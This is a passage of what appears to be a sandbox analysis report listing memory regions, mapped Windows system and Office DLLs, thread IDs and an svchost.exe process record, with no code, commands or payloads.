0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 483 start_va = 0x733c0000 end_va = 0x733cffff entry_point = 0x733c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 484 start_va = 0x71f70000 end_va = 0x71f81fff entry_point = 0x71f70000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 485 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 486 start_va = 0x71f60000 end_va = 0x71f67fff entry_point = 0x71f60000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 487 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 488 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 489 start_va = 0x2d30000 end_va = 0x2e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d30000" filename = "" Region: id = 490 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 491 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 496 start_va = 0x1810000 end_va = 0x1810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 497 start_va = 0x2390000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 498 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 499 start_va = 0x2f30000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 500 start_va = 0x6de50000 end_va = 0x6de7afff entry_point = 0x6de50000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 501 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 503 start_va = 0x1820000 end_va = 0x1821fff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 504 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 505 start_va = 0x1a80000 end_va = 0x1a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a80000" filename = "" Region: id = 506 start_va = 0x1a90000 end_va = 0x1a90fff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 507 start_va = 0x1aa0000 end_va = 0x1aa2fff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 508 start_va = 0x1ab0000 end_va = 0x1ab0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 509 start_va = 0x1ac0000 end_va = 0x1ac2fff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 510 start_va = 0x1bd0000 end_va = 0x1bd2fff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 511 start_va = 0x1be0000 end_va = 0x1be2fff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 512 start_va = 0x1bf0000 end_va = 0x1c01fff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 513 start_va = 0x1c10000 end_va = 0x1c10fff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 514 start_va = 0x1c90000 end_va = 0x1c90fff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 515 start_va = 0x1ca0000 end_va = 0x1ca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 516 start_va = 0x1cb0000 end_va = 0x1cb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 517 start_va = 0x1cc0000 end_va = 0x1cc0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 518 start_va = 0x1ce0000 end_va = 0x1ce3fff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 519 start_va = 0x1cf0000 end_va = 0x1cf0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 520 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 521 start_va = 0x26f0000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 522 start_va = 0x3120000 end_va = 0x321ffff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 523 start_va = 0x3220000 end_va = 0x3b4ffff entry_point = 0x3220000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 524 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 525 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 526 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 527 start_va = 0x1e00000 end_va = 0x1e07fff entry_point = 0x1e00000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 528 start_va = 0x1e40000 end_va = 0x1e4dfff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 529 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 530 start_va = 0x1e20000 end_va = 0x1e20fff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 531 start_va = 0x1e30000 end_va = 0x1e30fff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 532 start_va = 0x1f50000 end_va = 0x1f50fff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 533 start_va = 0x1f60000 end_va = 0x1f60fff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 534 start_va = 0x2070000 end_va = 0x2070fff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 535 start_va = 0x2080000 end_va = 0x2080fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 536 start_va = 0x2090000 end_va = 0x2090fff entry_point = 0x0 region_type = private name = "private_0x0000000002090000" filename = "" Region: id = 537 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 538 start_va = 0x20b0000 end_va = 0x20b0fff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 539 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 540 start_va = 0x2210000 end_va = 0x2210fff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 541 start_va = 0x2320000 end_va = 0x2320fff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 542 start_va = 0x2330000 end_va = 0x2330fff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 543 start_va = 0x2340000 end_va = 0x2340fff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 544 start_va = 0x2350000 end_va = 0x2350fff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 545 start_va = 0x2360000 end_va = 0x2360fff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 546 start_va = 0x2370000 end_va = 0x2370fff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 547 start_va = 0x2380000 end_va = 0x2380fff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 548 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 549 start_va = 0x2560000 end_va = 0x2560fff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 550 start_va = 0x2670000 end_va = 0x2670fff entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 551 start_va = 0x2680000 end_va = 0x2680fff entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 552 start_va = 0x2690000 end_va = 0x2690fff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 553 start_va = 0x26a0000 end_va = 0x26a0fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 554 start_va = 0x26b0000 end_va = 0x26b0fff entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 555 start_va = 0x26c0000 end_va = 0x26c0fff entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 556 start_va = 0x26d0000 end_va = 0x26d0fff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 557 start_va = 0x26e0000 end_va = 0x26e0fff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 558 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 559 start_va = 0x2740000 end_va = 0x2740fff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 560 start_va = 0x2750000 end_va = 0x2750fff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 561 start_va = 0x2760000 end_va = 0x2760fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 562 start_va = 0x2770000 end_va = 0x2770fff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 563 start_va = 0x2780000 end_va = 0x2780fff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 564 start_va = 0x2790000 end_va = 0x2795fff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 565 start_va = 0x27a0000 end_va = 0x27a0fff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 566 start_va = 0x27b0000 end_va = 0x27b0fff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 567 start_va = 0x27c0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 568 start_va = 0x27e0000 end_va = 0x27e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 569 start_va = 0x2e30000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 570 start_va = 0x71930000 end_va = 0x71a9efff entry_point = 0x71930000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 571 start_va = 0x73f60000 end_va = 0x73f8efff entry_point = 0x73f60000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 572 start_va = 0x73f90000 end_va = 0x74041fff entry_point = 0x73f90000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 573 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 574 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 577 start_va = 0x2790000 end_va = 0x279dfff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 578 start_va = 0x27f0000 end_va = 0x27f0fff entry_point = 0x27f0000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 579 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 677 start_va = 0x2790000 end_va = 0x2792fff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 678 start_va = 0x2d00000 end_va = 0x2d0dfff entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 679 start_va = 0x2d10000 end_va = 0x2d2efff entry_point = 0x2d10000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 680 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003030000" filename = "" Region: id = 681 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 682 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 683 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 684 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 685 start_va = 0x3080000 end_va = 0x3085fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 686 start_va = 0x3090000 end_va = 0x30a4fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 687 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 688 start_va = 0x30c0000 end_va = 0x30e3fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 689 start_va = 0x3c10000 end_va = 0x3d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 690 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 691 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 692 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 693 start_va = 0x3100000 end_va = 0x3108fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 694 start_va = 0x3110000 end_va = 0x3118fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 695 start_va = 0x3b50000 end_va = 0x3b73fff entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 696 start_va = 0x3d10000 end_va = 0x3e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 697 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 698 start_va = 0x71870000 end_va = 0x718a0fff entry_point = 0x71870000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 699 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 700 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 701 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 702 start_va = 0x3b80000 end_va = 0x3b82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 703 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 704 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 705 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 706 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 707 start_va = 0x3b90000 end_va = 0x3b93fff entry_point = 0x0 region_type = private name = "private_0x0000000003b90000" filename = "" Region: id = 708 start_va = 0x3ba0000 end_va = 0x3bb7fff entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 709 start_va = 0x3bc0000 end_va = 0x3bcffff entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 710 start_va = 0x3bd0000 end_va = 0x3bd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 711 start_va = 0x3be0000 end_va = 0x3beffff entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 712 start_va = 0x3bf0000 end_va = 0x3bfffff entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 713 start_va = 0x3c00000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 714 start_va = 0x3e10000 end_va = 0x3e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 715 start_va = 0x3e20000 end_va = 0x3e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 716 start_va = 0x3e30000 end_va = 0x3e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 717 start_va = 0x3e40000 end_va = 0x3e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 718 start_va = 0x3e50000 end_va = 0x3e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 719 start_va = 0x3e60000 end_va = 0x3e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 720 start_va = 0x3e70000 end_va = 0x3e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 721 start_va = 0x3e80000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 722 start_va = 0x3e90000 end_va = 0x3e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 723 start_va = 0x3ed0000 end_va = 0x3edffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 724 start_va = 0x4090000 end_va = 0x409ffff entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 725 start_va = 0x705e0000 end_va = 0x705e8fff entry_point = 0x705e0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 726 start_va = 0x705f0000 end_va = 0x70659fff entry_point = 0x705f0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 727 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 728 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 729 start_va = 0x3ea0000 end_va = 0x3ea1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ea0000" filename = "" Region: id = 730 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 731 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 732 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 733 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 734 start_va = 0x30c0000 end_va = 0x30d1fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 735 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 736 start_va = 0x3b50000 end_va = 0x3b61fff entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 737 start_va = 0x3ee0000 end_va = 0x3f27fff entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 738 start_va = 0x3f30000 end_va = 0x3f77fff entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 739 start_va = 0x6de10000 end_va = 0x6de3dfff entry_point = 0x6de10000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 836 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 837 start_va = 0x77370000 end_va = 0x77372fff entry_point = 0x77370000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Thread: id = 5 os_tid = 0xb68 Thread: id = 7 os_tid = 0xb9c Thread: id = 8 os_tid = 0xba0 Thread: id = 9 os_tid = 0xba4 Thread: id = 10 os_tid = 0xba8 Thread: id = 11 os_tid = 0xbac Thread: id = 24 os_tid = 0xbb0 Thread: id = 25 os_tid = 0xbb4 Thread: id = 26 os_tid = 0xbb8 Thread: id = 27 os_tid = 0xbbc Thread: id = 28 os_tid = 0xbc0 Thread: id = 29 os_tid = 0xbc4 Thread: id = 30 os_tid = 0xbc8 Thread: id = 31 os_tid = 0xbcc Thread: id = 32 os_tid = 0xbd0 Thread: id = 42 os_tid = 0xc00 Thread: id = 80 os_tid = 0xc18 Thread: id = 82 os_tid = 0xc24 Thread: id = 84 os_tid = 0xc34 Thread: id = 86 os_tid = 0xd2c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16200" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0xb64" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c2d0" [0xc000000f], "LOCAL" [0x7] Region: id = 325 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 326 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 327 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 328 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 329 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 330 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 331 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 332 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 333 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 334 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 335 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = 